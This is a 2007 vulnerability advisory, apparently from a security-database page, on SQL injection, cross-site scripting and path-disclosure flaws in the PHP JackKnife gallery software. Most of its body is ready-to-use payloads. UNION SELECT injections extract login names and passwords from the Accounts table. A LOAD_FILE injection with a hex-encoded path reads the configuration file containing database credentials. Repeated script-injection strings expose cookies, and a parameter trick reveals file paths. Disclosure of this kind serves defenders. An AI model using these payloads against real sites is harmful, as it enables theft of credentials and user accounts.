PHP JackKnife [multiple vulnerabilities]

2007-06-06 / 2007-06-07
Risk: Medium
Local: No
Remote: Yes

Vendor site: Product: phpjackknife Bug: sql injection , xss , full path Risk: high Note: works regarless of php.ini settings Description: PHP JackKnife (PHPJK) is freely downloadable PHP gallery software that you can use to instantly create you own online web gallery Injection sql GET :**/union/**/select/ **/1,2,Password,4,5,6/**/from/**/Accounts/* -1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/* Read database credentials:**/union/**/select/ **/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5 048504A4B2F436F6E66696775726174696F6E732F5048504A4B5F436F6E6669672E70687 0),4,5,6/**/from/**/Accounts/* //Result (in the page source code) : $sUseDB = "MYSQL"; $sDatabaseName = "phpjk"; $sDatabaseServer = "localhost"; $sDatabaseLogin = "my_user"; $sDatabasePassword = "my_password"; ps:( 0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php ) Xss get :</textarea>'"><script> alert(document.cookie)</script></textarea>'"><script>alert( document.cookie)</script></textarea>'"><script> alert(document.cookie)</script></textarea>'"><script> alert(document.cookie)</script></textarea>'"><script>alert(d ocument.cookie)</script></textarea>'"><s cript>alert(document.cookie)</script></text area>'"><script>alert(document.cookie)</script> Full path :[]=1[]=Name_A[]=0 regards laurent gaffie contact: laurent.gaffie (at) gmail (dot) com [email concealed]

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top